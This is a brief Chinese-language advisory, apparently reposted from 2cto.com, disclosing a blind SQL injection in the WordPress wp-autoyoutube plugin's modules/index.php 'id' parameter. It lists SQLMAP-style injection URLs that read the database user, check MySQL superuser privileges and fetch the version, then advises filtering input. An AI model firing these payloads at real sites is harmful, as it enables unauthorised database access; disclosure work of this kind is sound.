标题: WordPress wp-autoyoutube plugin Blind SQL Injection Vulnerability 作者: longrifle0x www.2cto.com 软件: Wordpress 下载 地址:http://wordpress.org/extend/plugins/wp-autoyoutube/ 测试工具: SQLMAP 概述 Wordpress的插件wp-autoyoutube被发现存在盲注问题 文件: wp-content/plugins/wp-autoyoutube/modules/index.php 测试方法: id=-1; or 1=if *测试* http://www.2cto.com /wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][CURRENT_USER() http://www.2cto.com /wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROM mysql .user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END) http://www.2cto.com /wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][MID((VERSION()),1,6) www.2cto.com提供修复方案 wp-content/plugins/wp-autoyoutube/modules/index.php过滤该页面参数输入
查看更多关于WordPress插件wp-autoyoutube盲注缺陷及修复 - 网站安全的详细内容...